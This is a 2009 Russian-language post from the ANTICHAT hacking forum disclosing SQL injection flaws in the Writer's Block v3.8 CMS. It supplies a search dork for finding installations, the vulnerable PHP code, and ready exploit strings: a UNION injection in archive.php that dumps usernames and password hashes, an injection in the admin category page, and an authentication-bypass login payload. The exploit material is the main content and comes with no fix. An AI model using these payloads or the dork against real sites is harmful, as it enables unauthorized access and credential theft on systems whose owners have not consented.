HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости Writer's Block v3.8
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости Writer's Block v3.8
  #1  
Старый 30.04.2009, 10:22
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию Уязвимости Writer's Block v3.8
Уязвимости Writer's Block v3.8
download: http://www.desiquintans.com/writers-block/downloads/writersblock-current.zip
dork: "Published by Writer’s Block"

SQL-injection

1) archive.php (требования: magic_quotes=off)
уязвимый код:
PHP код:
if(isset($_GET['cat'])) {
## Check if category exists
    $check strpos($_GET['cat'], '+');     //это, какбе, защита от инъекций, походу =)
    $check .= strpos($_GET['cat'], '%20');  //
    if(!$check) {
        $getinfo mysql_query("SELECT PCatID, PostCatName, PostDesc FROM ".POSTCAT_TBL." WHERE PostCatUrl='".$_GET['cat']."'");
    } 
эксплуатирование:
Код:
archive.php?cat=-1'/**/union/**/select/**/1,concat_ws(0x3a,UserName,Password),3/**/from/**/wb_users/*


2) /admin/cat.php (требования: доступ в админ панель)
уязвимый код:
PHP код:
elseif ($_GET['action'] == 'edit') {
    if (isset($_GET['PCatID'])) {
        ## Edit post category
        $pagetitle 'Edit Post Category';
        include ('include/head.htm');

        $retrieve mysql_query ("SELECT * FROM ".POSTCAT_TBL." WHERE PCatID=".$_GET['PCatID']); 
эксплуатирование:
в этой инъекции мк=офф уже не обязательно, но в админку еще попасть надо =)...
Код:
admin/cat.php?action=edit&PCatID=1+union+select+1,2,3,version(),5--

Bypass (требования: magic_quotes=off)
уязвимый код:
/admin/login.php
PHP код:
if($_POST['login']) {
    $error NULL;
    if(empty($_POST['username']) or strpos($_POST['username'], ' ')) {
        $u FALSE;
        $error .= '<p align="center"><img src="include/img/failure.png" width="16" height="16" alt="" /> Invalid username.</p>';
    } else {
        $u =& $_POST['username'];
    }
    if(empty($_POST['password']) or strpos($_POST['password'], ' ')) {
        $p FALSE;
        $error .= '<p align="center"><img src="include/img/failure.png" width="16" height="16" alt="" /> Invalid password.</p>';
    } else {
        $p =& $_POST['password'];
    }

    if($u and $p) {
        $get_user_auth mysql_query("SELECT UserID, UserName, Password FROM ".USERS_TBL." WHERE UserName='$u' AND Password='".md5($p)."'"); 
эксплуатирование:
идем в /admin/login.php и вбиваем:

Username:'/**/or/**/1=1/*
Password:<any symbols without space>
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Iceangel_; 30.04.2009 в 10:26..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости. Обсуждения. 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.